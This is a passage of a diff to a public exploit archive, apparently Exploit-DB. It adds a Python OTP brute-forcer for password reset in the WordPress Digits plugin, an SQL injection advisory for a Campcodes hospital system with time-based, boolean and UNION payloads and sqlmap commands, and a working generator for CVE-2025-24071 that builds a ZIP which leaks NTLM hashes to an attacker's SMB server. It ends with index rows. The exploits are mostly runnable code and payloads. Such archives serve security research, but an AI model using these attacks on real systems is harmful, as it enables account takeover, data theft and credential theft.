 5. Start the attack and monitor responses for a different status code, length, or success message.
 """
 import requests
 def brute(otp):
    url = "https://example.com/wp-admin/admin-ajax.php"
    data = {                                             # Replace with targets data
        "login_digt_countrycode": "+",
        "digits_phone": "000000000",
        "action_type": "phone",
        "sms_otp": otp,
        "otp_step_1": "1",
        "instance_id": "xxxxxxx",
        "action": "digits_forms_ajax",
        "type": "forgot",
        "forgot_pass_method": "sms_otp",
        "digits": "1",
        "digits_redirect_page": "//example.com/",
        "digits_form": "xxxxxxxx",
        "_wp_http_referer": "/?login=true"
    }
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": "https://example.com/?login=true"  # Replace with intercepted referer
    }
    response = requests.post(url, data=data, headers=headers)
    if '"success":true' in response.text:
        print(f"[+] OTP FOUND: {otp}")
        exit()
 def main():
    for otp in range(0, 10000): # range(0, 1000000): for 6-digit
        otp_str = f"{otp:04d}"     # {otp:06d} for 6-digit
        print(f"[*] Trying OTP: {otp_str}")
        brute(otp_str)
 if __name__ == "__main__":
    main()
--- a/exploits/multiple/webapps/52312.txt
+++ b/exploits/multiple/webapps/52312.txt
@ -0,0 +1,72 @@
 # Exploit Title: Campcodes Online Hospital Management System 1.0 - SQL Injection
 # Google Dork: N/A
 # Exploit Author: Carine Constantino
 # Vendor Homepage: https://www.campcodes.com
 # Software Link: https://www.campcodes.com/projects/online-hospital-management-system-using-php-and-mysql/
 # Version: 1.0
 # Tested on: Linux - Ubuntu Ubuntu 23.10
 # CVE: CVE-2025-5298
 # Campcodes Online Hospital Management System 1.0 is vulnerable to SQL Injection
 # The report in admin/betweendates-detailsreports.php does not validate ‘fromdate’ and ‘todate’ fields
 #  And allows the processing of SQL Injection queries of the types:
 # blind time-based in the ‘fromdate’ field
 # boolean-based in the ‘todate’ field
 # Union Query in the ‘todate’ field
 ‘fromdate’ field is vulnerable to SQL Injection on reports accessed on “/admin/betweendates-detailsreports.php” from POST request
 POST /HospitalManagementSystem/hospital/hms/admin/betweendates-detailsreports.php HTTP/1.1
 Host: 127.0.0.1
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate, br
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 45
 Origin: http://127.0.0.1
 Connection: keep-alive
 Referer: http://127.0.0.1/HospitalManagementSystem/hospital/hms/admin/between-dates-reports.php
 Cookie: ajs_anonymous_id=e18be7d3-2b50-4bed-9962-5cfab989426f; PHPSESSID=hfb8j1phivvf11o2j9cd492oqe
 Upgrade-Insecure-Requests: 1
 Priority: u=0, i
 fromdate=&todate=&submit=
 =======================================|| Blind Time Based - ‘fromdate’ field ||==============================================
 SQLMap identified the following injection payload:
 Parameter: fromdate (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: fromdate=2019-01-01' AND (SELECT 5962 FROM (SELECT(SLEEP(5)))danz) AND 'awPP'='awPP&todate=2025-05-28&submit=
 SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p fromdate --dbs --random-agent --technique=T”
 =======================================|| Boolean Based - ‘todate’ field ||==============================================
 ‘todate’ field is vulnerable to SQL Injection on reports accessed on “/admin/betweendates-detailsreports.php” from POST request
 SQLMap identified the following injection payload:
 Parameter: todate (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fromdate=2019-01-01&todate=2025-05-28' AND 3290=3290 AND 'yOfc'='yOfc&submit=
 SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p todate --dbs --random-agent --technique=B”
 =======================================|| Union Query - ‘todate’ field ||==============================================
 Another technique on ‘todate’ field can be exploited
 SQLMap identified the following injection payload:
 Parameter: todate (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: fromdate=2019-01-01&todate=2025-05-28' UNION ALL SELECT CONCAT(CONCAT('qkpxq','eLwmjRlXmPYByrACqjbUDqzOqYmBeKwQSUSMNXdM'),'qzzbq'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ckvh&submit=
 SQLMap first command to confirm the vulnerability: “sqlmap -r request.txt -p todate --dbs --random-agent --technique=U”
--- a/exploits/windows/remote/52310.py
+++ b/exploits/windows/remote/52310.py
@ -0,0 +1,85 @@
 #!/usr/bin/env python3
 # Exploit Title: Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure
 # Exploit Author: Mohammed Idrees Banyamer
 # Twitter/GitHub:https://github.com/mbanyamer
 # Date: 2025-05-27
 # CVE: CVE-2025-24071
 # Vendor: Microsoft
 # Affected Versions: Windows 10/11 (All supporting .library-ms and SMB)
 # Tested on: Windows 11 (23H2)
 # Type: Local / Remote (NTLM Leak)
 # Platform: Windows
 # Vulnerability Type: Information Disclosure
 # Description:
 #   Windows Explorer automatically initiates an SMB authentication request when a
 #   .library-ms file is extracted from a ZIP archive. This causes NTLM credentials
 #   (in hashed format) to be leaked to a remote SMB server controlled by the attacker.
 #   No user interaction is required beyond extraction.
 import zipfile
 from pathlib import Path
 import argparse
 import re
 import sys
 from colorama import Fore, Style
 def create_library_ms(ip: str, filename: str, output_dir: Path) -> Path:
    """Creates a malicious .library-ms file pointing to an attacker's SMB server."""
    payload = f'''<?xml version="1.0" encoding="UTF-8"?>
 <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\{ip}\\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
 </libraryDescription>'''
    output_file = output_dir / f"{filename}.library-ms"
    output_file.write_text(payload, encoding="utf-8")
    return output_file
 def build_zip(library_file: Path, output_zip: Path):
    """Packages the .library-ms file into a ZIP archive."""
    with zipfile.ZipFile(output_zip, 'w', zipfile.ZIP_DEFLATED) as archive:
        archive.write(library_file, arcname=library_file.name)
    print(f"{Fore.GREEN}[+] Created ZIP: {output_zip}{Style.RESET_ALL}")
 def is_valid_ip(ip: str) -> bool:
    return re.match(r"^\d{1,3}(\.\d{1,3}){3}$", ip) is not None
 def main():
    parser = argparse.ArgumentParser(
        description="CVE-2025-24071 - NTLM Hash Disclosure via .library-ms ZIP Archive",
        epilog="example:\n  python3 CVE-2025-24071_tool.py -i 192.168.1.100 -n payload1 -o ./output_folder --keep",
        formatter_class=argparse.RawTextHelpFormatter
    )
    parser.add_argument("-i", "--ip", required=True, help="Attacker SMB IP address (e.g., 192.168.1.100)")
    parser.add_argument("-n", "--name", default="malicious", help="Base filename (default: malicious)")
    parser.add_argument("-o", "--output", default="output", help="Output directory (default: ./output)")
    parser.add_argument("--keep", action="store_true", help="Keep .library-ms file after ZIP creation")
    args = parser.parse_args()
    if not is_valid_ip(args.ip):
        print(f"{Fore.RED}[!] Invalid IP address: {args.ip}{Style.RESET_ALL}")
        sys.exit(1)
    output_dir = Path(args.output)
    output_dir.mkdir(parents=True, exist_ok=True)
    print(f"{Fore.CYAN}[*] Generating malicious .library-ms file...{Style.RESET_ALL}")
    library_file = create_library_ms(args.ip, args.name, output_dir)
    zip_file = output_dir / f"{args.name}.zip"
    build_zip(library_file, zip_file)
    if not args.keep:
        library_file.unlink()
        print(f"{Fore.YELLOW}[-] Removed intermediate .library-ms file{Style.RESET_ALL}")
    print(f"{Fore.MAGENTA}[!] Done. Send ZIP to victim and listen for NTLM hash on your SMB server.{Style.RESET_ALL}")
 if __name__ == "__main__":
    main()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10794,6 +10794,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46731,exploits/multiple/remote/46731.rb,"Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)",2019-04-19,Metasploit,remote,multiple,,2019-04-19,2019-04-19,1,CVE-2019-3396,Remote,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/confluence_widget_connector.rb
 38905,exploits/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin - Velocity Template Injection (Metasploit)",2015-12-08,Metasploit,remote,multiple,8080,2015-12-08,2015-12-08,1,CVE-2015-5603;OSVDB-126829,"Metasploit Framework (MSF)",,,,https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html
 35898,exploits/multiple/remote/35898.php,"Atlassian JIRA 3.13.5 - File Download Security Bypass",2011-06-28,"Ignacio Garrido",remote,multiple,,2011-06-28,2015-01-26,1,,,,,,https://www.securityfocus.com/bid/48484/info
 52309,exploits/multiple/remote/52309.txt,"Automic Agent 24.3.0 HF4 - Privilege Escalation",2025-05-29,"Flora Schäfer",remote,multiple,,2025-05-29,2025-05-29,0,CVE-2025-4971,,,,,
 22296,exploits/multiple/remote/22296.txt,"Axis Communications HTTP Server 2.x - Messages Information Disclosure",2003-02-28,"Martin Eiszner",remote,multiple,,2003-02-28,2012-10-28,1,CVE-2003-1386;OSVDB-4806,,,,,https://www.securityfocus.com/bid/6980/info
 43985,exploits/multiple/remote/43985.txt,"Axis Communications MPQT/PACS - Heap Overflow / Information Leakage",2017-11-30,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/9a1d3d165d7b32addf6d0a9ccf86626ee7e76093/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt
 40125,exploits/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include Daemon Remote Format String",2016-07-19,bashis,remote,multiple,,2016-07-19,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/53a2d49c1e4076e8559bb937f790e724fc52ca1d/axis-ssid-PoC.py
@ -10936,6 +10937,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 28210,exploits/multiple/remote/28210.txt,"FLV Players 8 - 'popup.php?url' Cross-Site Scripting",2006-07-12,xzerox,remote,multiple,,2006-07-12,2013-09-11,1,CVE-2006-3624;OSVDB-28644,,,,,https://www.securityfocus.com/bid/18954/info
 36013,exploits/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,remote,multiple,,2011-08-03,2015-02-07,1,,,,,,https://www.securityfocus.com/bid/48982/info
 39222,exploits/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",remote,multiple,,2014-06-05,2016-01-11,1,CVE-2014-0007;OSVDB-108277,,,,,https://www.securityfocus.com/bid/68117/info
 52308,exploits/multiple/remote/52308.py,"Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-0204,,,,,
 23707,exploits/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",remote,multiple,,2004-02-16,2012-12-31,1,CVE-2004-0290;OSVDB-3982,,,,,https://www.securityfocus.com/bid/9671/info
 29873,exploits/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,remote,multiple,,2007-04-20,2013-11-28,1,CVE-2007-2191;OSVDB-35315,,,,,https://www.securityfocus.com/bid/23575/info
 47698,exploits/multiple/remote/47698.rb,"FreeSWITCH - Event Socket Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,,2019-11-20,2019-11-20,1,,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/misc/freeswitch_event_socket_cmd_exec.rb
@ -11532,6 +11534,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 27931,exploits/multiple/remote/27931.txt,"Snort 2.4.x - URIContent Rules Detection Evasion",2006-05-31,"Blake Hartstein",remote,multiple,,2006-05-31,2013-08-29,1,CVE-2006-2769;OSVDB-25837,,,,,https://www.securityfocus.com/bid/18200/info
 21029,exploits/multiple/remote/21029.pl,"Softek MailMarshal 4 / Trend Micro ScanMail 1.0 - SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",remote,multiple,,2001-07-25,2012-09-03,1,OSVDB-88584;OSVDB-88583,,,,,https://www.securityfocus.com/bid/3097/info
 16324,exploits/multiple/remote/16324.rb,"Solaris Sadmind - Command Execution (Metasploit)",2010-06-22,Metasploit,remote,multiple,,2010-06-22,2016-10-27,1,CVE-2003-0722;OSVDB-4585,"Metasploit Framework (MSF)",,,,
 52311,exploits/multiple/remote/52311.py,"SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-28995,,,,,
 36537,exploits/multiple/remote/36537.txt,"SonicWALL AntiSpam & EMail 7.3.1 - Multiple Vulnerabilities",2012-01-10,"Benjamin Kunz Mejri",remote,multiple,,2012-01-10,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/51337/info
 31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,,2008-05-08,2014-02-19,1,CVE-2008-2162;OSVDB-45017,,,,,https://www.securityfocus.com/bid/29107/info
 24322,exploits/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload (Metasploit)",2013-01-24,Metasploit,remote,multiple,,2013-01-24,2013-01-24,1,CVE-2013-1359;OSVDB-89347,"Metasploit Framework (MSF)",,,,
@ -11836,6 +11839,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48145,exploits/multiple/webapps/48145.py,"Cacti 1.2.8 - Unauthenticated Remote Code Execution",2020-02-03,Askar,webapps,multiple,,2020-02-27,2020-02-27,0,CVE-2020-8813,,,,,https://github.com/mhaskar/CVE-2020-8813/blob/dfb48378f39249ff54ecf24ccd3b89db26971ccf/Cacti-preauth-rce.py
 52067,exploits/multiple/webapps/52067.txt,"Calibre-web 0.6.21 - Stored XSS",2024-08-23,"Catalin Iovita_ Alexandru Postolache",webapps,multiple,,2024-08-23,2024-08-23,0,,,,,,
 18430,exploits/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 - SQL Injection",2012-01-30,"Craig Freyman",webapps,multiple,,2012-01-30,2012-01-30,0,OSVDB-78888,,,,,
 52312,exploits/multiple/webapps/52312.txt,"Campcodes Online Hospital Management System 1.0 - SQL Injection",2025-05-29,"Carine Constantino",webapps,multiple,,2025-05-29,2025-05-29,0,CVE-2025-5298,,,,,
 18247,exploits/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",webapps,multiple,,2011-12-16,2011-12-16,1,OSVDB-77998;CVE-2011-5031,,,,,
 50792,exploits/multiple/webapps/50792.go,"Casdoor 1.13.0 - SQL Injection (Unauthenticated)",2022-02-28,"Mayank Deshmukh",webapps,multiple,,2022-02-28,2022-02-28,0,CVE-2022-24124,,,,,
 48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,,2020-06-04,2020-06-04,0,,,,,,
@ -12504,6 +12508,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 52248,exploits/multiple/webapps/52248.txt,"WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-0399,,,,,
 47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
 52285,exploits/multiple/webapps/52285.py,"WordPress Depicter Plugin 3.6.1 - SQL Injection",2025-05-09,"Andrew Long",webapps,multiple,,2025-05-09,2025-05-09,0,CVE-2025-2011,,,,,https://github.com/datagoboom/CVE-2025-2011
 52307,exploits/multiple/webapps/52307.txt,"WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing",2025-05-29,"Saleh Tarawneh",webapps,multiple,,2025-05-29,2025-05-29,0,CVE-2025-4094,,,,,
 52291,exploits/multiple/webapps/52291.py,"WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation",2025-05-13,"Md Shoriful Islam",webapps,multiple,,2025-05-13,2025-05-13,0,CVE-2025-3605,,,,,
 49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,,
 48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,,
@ -45941,6 +45946,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,,
 51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,,
 52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,,
 52310,exploits/windows/remote/52310.py,"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure",2025-05-29,"Mohammed Idrees Banyamer",remote,windows,,2025-05-29,2025-05-29,0,CVE-2025-24071,,,,,
 30169,exploits/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,remote,windows,,2007-06-11,2013-12-10,1,CVE-2007-3201;OSVDB-41727,,,,,https://www.securityfocus.com/bid/24412/info
 16529,exploits/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-0348;OSVDB-34315,"Metasploit Framework (MSF)",,,,
 7875,exploits/windows/remote/7875.pl,"WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow",2009-01-26,"joe walko",remote,windows,21,2009-01-25,2016-09-27,1,OSVDB-51667;CVE-2009-0351,,,,,